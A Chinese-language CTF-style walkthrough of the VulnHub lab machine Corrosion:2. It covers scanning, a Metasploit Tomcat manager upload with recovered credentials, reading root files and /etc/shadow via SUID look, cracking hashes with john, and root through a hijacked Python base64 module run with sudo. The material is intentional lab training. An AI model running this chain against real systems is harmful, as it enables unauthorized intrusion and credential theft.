看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2

简介: 看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。



这是一个漏洞靶机,老样子需要找到flag即可。

Difficulty: Medium

Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/corrosion/Corrosion2.ova



Vulnhub靶机安装:

下载好了把安装包解压 然后使用VMware打开即可。


Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机



使用命令:nmap -sS -sV -T4 -n -p- 192.168.0.100

渗透机:kali IP :192.168.0.104 靶机IP :192.168.0.100

开启了22、80、8080端口 8080发现开启了tomcat服务
老样子访问80端口(Apache默认页面)进行扫描:dirb、dirsearch、whatweb、gobuster、nikto

dirsearch -u http://192.168.0.100  #没有可以利用的信息(一般没有可以利用信息就扫二级目录)
dirsearch -u http://192.168.0.100:8080 #这波信息收集得到了backup.zip和readme.txt文件
gobuster dir -u http://192.168.0.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip  #没有可以利用的信息
gobuster dir -u http://192.168.0.100:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 400,404 
whatweb



4e06a0df98304a669321687dfb8e660e.png

ebd15a33d18244eb8cdf1551cc34bfaf.png


0c73a851059e4a9eb7da90ea808727f9.png


得到一个账号:randy 下载backup.zip发现需要密码尝试爆破和Corrosion1一样 得到密码:@administrator_hi5

可以参考Corrosion系列第一篇有详细方法:http://t.csdn.cn/XmjAR




aef9757067ee4759ae413255df82777f.png

11b053be6b8c46b591bfe8fb88e55d22.png


查看配置文件 tomcat-users.xml,找到两组账户密码分别为:manager/melehifokivaiadmin/melehifokivai尝试登入,登入成功!

②:Tomcat msf 上传漏洞拿到shell:

打开msfconsole控制台使用模块:use exploit/multi/http/tomcat_mgr_upload 设置参数

set RHOST 192.168.0.100
set HttpPassword  melehifokivai
set HttpUsername  manager
set RPORT  80  
run


0514c884af5d46248fc612429687f6a9.png

bb63bd9a76134282b41360c631ccacf8.png

切换Shell,家里面下面三个用户jaye没权限进入randy用户查看user.txt得到第一个flag!


828ee7d6ed04401987fd8bce3a895c04.png

尝试切换jaye用户,试了一下tomcat的密码 进去了神奇! 使用python获取终端:python3 -c 'import pty;pty.spawn("/bin/bash")'


cat /etc/passwd 发现有ssh 那我们就切换使用ssh登入这样操作方便点!


使用命令查看有root可以执行的命令:find / -perm -u=s -type f 2>/dev/null


③:look越权操作:

这里发现了一个look命令可以使用(第一次使用,不会啊~)看不了没权限 运行./look '' "$LFILE"查看的

文件名即可。


look越权命令使用方法:https://gtfobins.github.io/gtfobins/look/



其实这里直接可以使用这个越权命令查看root文件了 ./look '' /root/root.txt

查看/etc/shadow/ect/passwd文件,unshadow命令生成需要破解的密码全部复制然后john进行爆破


(必须要复制两个文件的全部内容不然出不来)字典是:rockyou.txt(时间比较久!!)

unshadow passwd shadow > pass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt  

c60a1042c0b84fecb6750cfe5e7b3df3.png


1e06cbe4aca84976bda6325046220722.png

得到randy得密码为:07051986randy

④:sudo执行Base64.py提权

登入成功后信息收集一波:id,whoami,sudo-l 发现可以执行randombase64这个py脚本



5c673142ff784bbab0f68e368706c6c3.png

我们直接在python程序 base64 模块里面写入shell先找到这个脚本然后使用vi或者nano编辑器 ctrl+X 推出(第一次用搞半天)

cd /usr/lib/python3.8
ls -al base*  #找到base64.py 写入下面得内容
import os
os.system("bin/bash")
sudo /usr/bin/python3.8  /home/randy/randombase64.py #运行即可 因为使用得是pyton3.8 也可以尝试别的成功即可!!

592e7087823d402492dc1d0eba88f0d1.png


a352292c06b64060b4d5254fdba7b17e.png


e434a05a16a449e68b6461f5d6716be2.png

⑤:获取LFAGL:

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!


Vulnhub靶机渗透总结:

这个靶机难度中偏上 因为比较麻烦


1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster,whatweb,ffuf等 查看F12源码信息

2.MSF exploit/multi/http/tomcat_mgr_upload模块getshell(要知道账号密码)

3.zip2john爆破和fcrackzip(爆破压缩包工具)还有john报错解决方法(新知识点!)

4.look命令越权读取文件 ./look '' 文件名即可

5.unshadow用户密码破解工具(第一次用 新工具!!)

6.sudo 提权执行base64.py写入shell提权

7.Linux Polkit 权限提升漏洞 CVE-2021-4034(太晚了睡觉了这里就先不演示了大家可以了解一下)


Corrosion系列完结啦,学习到了很多知识点又是收获满满的一天(耶耶耶!)

最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

相关文章
|
2月前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
34 4
|
2月前
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
41 4
|
2月前
|
Devops Shell 网络安全
Neos的渗透测试靶机练习——Wakanda
Neos的渗透测试靶机练习——Wakanda
27 2
|
3月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
47 0
|
3月前
|
安全 网络协议 Shell
渗透测试-靶机DC-1-知识点总结
渗透测试-靶机DC-1-知识点总结
47 0
|
3天前
|
监控 JavaScript 测试技术
postman接口测试工具详解
Postman是一个功能强大且易于使用的API测试工具。通过详细的介绍和实际示例,本文展示了Postman在API测试中的各种应用。无论是简单的请求发送,还是复杂的自动化测试和持续集成,Postman都提供了丰富的功能来满足用户的需求。希望本文能帮助您更好地理解和使用Postman,提高API测试的效率和质量。
27 11
|
1月前
|
JSON Java 测试技术
SpringCloud2023实战之接口服务测试工具SpringBootTest
SpringBootTest同时集成了JUnit Jupiter、AssertJ、Hamcrest测试辅助库,使得更容易编写但愿测试代码。
60 3
|
2月前
|
JSON 算法 数据可视化
测试专项笔记(一): 通过算法能力接口返回的检测结果完成相关指标的计算(目标检测)
这篇文章是关于如何通过算法接口返回的目标检测结果来计算性能指标的笔记。它涵盖了任务描述、指标分析(包括TP、FP、FN、TN、精准率和召回率),接口处理,数据集处理,以及如何使用实用工具进行文件操作和数据可视化。文章还提供了一些Python代码示例,用于处理图像文件、转换数据格式以及计算目标检测的性能指标。
74 0
测试专项笔记(一): 通过算法能力接口返回的检测结果完成相关指标的计算(目标检测)
|
3月前
|
移动开发 JSON Java
Jmeter实现WebSocket协议的接口测试方法
WebSocket协议是HTML5的一种新协议,实现了浏览器与服务器之间的全双工通信。通过简单的握手动作,双方可直接传输数据。其优势包括极小的头部开销和服务器推送功能。使用JMeter进行WebSocket接口和性能测试时,需安装特定插件并配置相关参数,如服务器地址、端口号等,还可通过CSV文件实现参数化,以满足不同测试需求。
262 7
Jmeter实现WebSocket协议的接口测试方法
|
3月前
|
JSON 移动开发 监控
快速上手|HTTP 接口功能自动化测试
HTTP接口功能测试对于确保Web应用和H5应用的数据正确性至关重要。这类测试主要针对后台HTTP接口,通过构造不同参数输入值并获取JSON格式的输出结果来进行验证。HTTP协议基于TCP连接,包括请求与响应模式。请求由请求行、消息报头和请求正文组成,响应则包含状态行、消息报头及响应正文。常用的请求方法有GET、POST等,而响应状态码如2xx代表成功。测试过程使用Python语言和pycurl模块调用接口,并通过断言机制比对实际与预期结果,确保功能正确性。
271 3
快速上手|HTTP 接口功能自动化测试
下一篇
DataWorks